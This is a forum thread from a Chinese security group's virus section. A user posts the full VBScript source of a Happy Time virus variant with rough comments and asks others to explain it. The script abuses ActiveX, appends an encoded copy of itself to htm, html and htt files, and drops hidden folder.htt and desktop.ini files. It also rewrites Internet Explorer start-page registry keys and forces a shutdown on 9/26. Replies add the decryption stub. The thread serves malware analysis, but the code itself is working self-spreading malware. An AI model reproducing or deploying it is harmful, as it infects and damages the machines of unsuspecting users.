|
 | 作者: z7 [skyzz]
 论坛用户 |
登录 |
| On Error Resume Next '只是病毒的关键部分 这里是对出错进行处理,不至于崩溃 dim AppObj,fso,WsShell,WinDir,TemplateDir,ThisDirPath,TemplateFile,myStartPage,DesktopINI,folderHTT,myEncString,fString,vCode ’声明了一堆东西 dim myExpMain(2),myLocalKey(2),iniLine(8),dropMe(4) ’声明了一些字符串 document.write "<"&"div style='visibility: hidden'><"&"applet name='vbs.icarOs.0.0.11' code=com.ms.activeX.ActiveXComponent></"&"applet></"&"div>" '&是连接字符串的意思 myData="<"&"script language=""vbscript"" for=""window"" event=""" document.write myData & "onload"">main_onload()</"&"script>" document.write myData & "onunload"">main_onunload()</"&"script>" sub main_onload() '定义了过程 initActiveX() initDirPaths() initRegEntries() initDropCodes() checkExistFiles() infectThisFile(TemplateFile) infectRootDir() end sub sub main_onunload() infectRootDir() checkExistFiles() infectThisFile(TemplateFile) mergeRegEntries() ScanFilesIn(ThisDirPath) checkDatePLoad() end sub sub initActiveX() '给过程加语句组 我怎么看着像网页的恶意代码 On Error Resume Next Set AppObj = document.applets("vbs.icarOs.0.0.11") AppObj.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppObj.createInstance() Set WsShell = AppObj.GetObject() AppObj.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppObj.createInstance() Set fso = AppObj.GetObject() end sub sub initDirPaths() On Error Resume Next WinDir = fso.GetSpecialFolder(0) ’给windir赋值为 返回系统文件夹 TemplateDir = WinDir & "\" & "Web" & "\" '使templatedir为系统文件下的\web\路径 TemplateFile = TemplateDir & "folder.htt" ThisDirPath = Mid(window.location, 9, Len(window.location)) For x = Len(ThisDirPath) To 1 Step -1 If Mid(ThisDirPath, x, 1) = "/" Then Exit For Next '一个循环 得x值下面有用 If LCase(Right(ThisDirPath, 3)) = "htm" Or LCase(Right(ThisDirPath, 4)) = "html" Then ThisDirPath = Mid(ThisDirPath, 1, x) Else ThisDirPath = Mid(ThisDirPath, 1, Len(ThisDirPath) + x) & "/" 'x值用在这里 ThisDirPath = unescape(ThisDirPath) End If end sub sub initRegEntries() 改注册表 指向指定的网页 可能是为了保护不被那么容易杀 On Error Resume Next myLocalKey(0) = "Start Page" myLocalKey(1) = "Local Page" myLocalKey(2) = "Default_Page_URL" myExpMain(0) = "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\" myExpMain(1) = "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\" myExpMain(2) = "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\" myStartPage = "http://www.geocities.com/hedda_marie_tolentino/index.htm" end sub sub initDropCodes() '写desktop.ini文件 On Error Resume Next iniLine(0)="[ExtShellFolderViews]" iniLine(1)="Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}" iniLine(2)="{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}" iniLine(3)="" iniLine(4)="[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]" iniLine(5)="PersistMoniker=file://Folder.htt" iniLine(6)="" iniLine(7)="[.ShellClassInfo]" iniLine(8)="ConfirmFileOp=0" for x = 0 to 8 DesktopINI=DesktopINI & iniLine(x) & vbcrlf ’vbcrlf 回车换行 next folderHTT = "<"&"html><"&"body style=""margin: 0"" scroll=no><"&"object id=FileList border=0 tabindex=1 classid=""clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"" style=""width: 100%; height: 100%"" tabIndex=-1></"&"object></"&"body></"&"html>" dropMe(0) = "<"&"script language=""vbscript""><"&chr(33)&"--" dropMe(1) = "myEncString="""&myEncString&"""" dropMe(2) = "Exe" & "cute(""for i=1 to Len(myEncString)"" & vbcrlf & ""s=chr(asc(mid(myEncString,i,1))+i mod 2)"" & vbcrlf & ""if s=chr(19) then s=chr(34)"" & vbcrlf & ""if s=chr(28) then s=vbCr"" & vbcrlf & ""if s=chr(29) then s=vbLf"" & vbcrlf & ""myDecString=myDecString & s"" & vbcrlf & ""next"")" dropMe(3) = "Exe" & "cute(myDecString)" dropMe(4) = "--" & "></" & "script>" for x = 0 to 4 vCode=vCode & dropMe(x) & vbcrlf next fString=myEncString end sub '写htt文件 Sub ScanFilesIn(folderspec) 扫描文件,传播其他文件的前提 On Error Resume Next Set myFolders2 = fso.GetFolder(folderspec) Set mySubFolderFiles = myFolders2.Files For Each mySubFolderFile In mySubFolderFiles myExt = LCase(fso.GetExtensionName(mySubFolderFile.Name)) If myExt = "htm" Or myExt = "html" Or myExt = "htt" Then infectThisFile (mySubFolderFile.Path) '判断htm和html文件,这里把文件后3or4个字转为小写判断,并对htm和html为结尾的文件进行替换 If myExt = "htt" Then Set myFile = fso.GetFile(mySubFolderFile.Path) myFile.Attributes = 7 ’设定文件为只读,隐藏,系统文件 End If End If Next End Sub Sub infectThisFile(folderspec) On Error Resume Next Set myFile = fso.OpenTextFile(folderspec) myContents = myFile.ReadAll myFile.Close k=0 for i= len(myContents) to 1 step -1 if mid(myContents,i,len(fString))=fString then k=k+1 exit for end if next if k=0 then vPCode=myContents & vbcrlf & vCode Set myFile = fso.GetFile(folderspec) myFile.Attributes = 0 Set myFile = fso.OpenTextFile(folderspec, 2) myFile.Write vPCode myFile.Close end if End Sub sub checkExistFiles() ’检查是不是感染了,没有就感染 On Error Resume Next If not(fso.FolderExists(TemplateDir)) Then Set myFile = fso.CreateFolder(TemplateDir) Set myFile = fso.GetFolder(TemplateDir) myFile.Attributes = 7 CreateThisFile TemplateFile,folderHTT end sub sub infectRootDir() On Error Resume Next If Len(unescape(ThisDirPath)) <= 4 Then ThisDirPath =Mid(ThisDirPath, 1, 3) CreateThisFile ThisDirPath&"folder.htt",folderHTT&vbcrlf&vCode CreateThisFile ThisDirPath&"desktop.ini",DesktopINI end if end sub sub mergeRegEntries() ’并入注册表 On Error Resume Next for x=0 to 2 ApplyRegChangesTo myExpMain(x) & myLocalKey(x), "REG_SZ", myStartPage next end sub Sub ApplyRegChangesTo(myRegKey, myRegType, myRegValue) On Error Resume Next WsShell.RegWrite myRegKey, myRegValue, myRegType End Sub Sub checkDatePLoad() '做一个计算,到指定时间 重启explorer(用rundll32.exe) On Error Resume Next If Mid(FormatDateTime(Now(), 2), 1, 4) = "9/26" Then WsShell.Run ("RUNDLL32.EXE shell32.dll,SHExitWindowsEx 2") End Sub Sub CreateThisFile(folderspec,withContents) On Error Resume Next set myFile=fso.GetFile(folderspec) myFile.Attributes = 0 Set myFile=fso.CreateTextFile(folderspec, True) myFile.Write withContents myFile.Close set myFile=fso.GetFile(folderspec) myFile.Attributes = 7 End Sub 我昨天才看的vbs 注释的不清楚 请高手注释啊~~ [此贴被 z7(skyzz) 在 06月17日11时12分 编辑过] |
| 地主 发表时间: 04-06-16 19:57 |
 | 回复: kailangq [kailangq]  版主 |
登录 |
|
......实话...看不懂....谁给点提示或解释? |
| B1层 发表时间: 04-06-17 00:27 |
| 回复: z7 [skyzz] 论坛用户 |
登录 |
|
附上 解密的代码部分 Execute("for i=1 to len(EncString)"&"vbcrlf&"s=chr(asc(mid(myEncString,i,1))+i mod 2)"&vbcrbf if s=chr(19) then s=shr(34)"&vbcrlf &"if s=chr(29) then s=vblf"&"if s=chr(29) then s=vblf"&vbcrlf&"myDecString=myDecString&s"vbcrlf&"next") Execute(myDecString) TATADE JIA MI FANG SHI YE BU HAO A |
| B2层 发表时间: 04-06-17 11:23 |
 | 回复: jacker [jacker]  论坛用户 |
登录 |
|
已经注释得很不错了.详细些会更好. sub initActiveX() '给过程加语句组 我怎么看着像网页的恶意代码 On Error Resume Next Set AppObj = document.applets("vbs.icarOs.0.0.11") AppObj.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") AppObj.createInstance() Set WsShell = AppObj.GetObject() AppObj.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") AppObj.createInstance() Set fso = AppObj.GetObject() end sub 这些相关的类ID. 你可以通过搜索注册表来确定他所指向的程序. |
| B3层 发表时间: 04-06-17 17:00 |
 | 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
好! 顶了! 不过 我一打开这个页面 我的诺顿就提示有病毒! |
| B4层 发表时间: 04-06-18 14:09 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 最近截到一个很奇怪的欢乐时光变种大家看看源码啊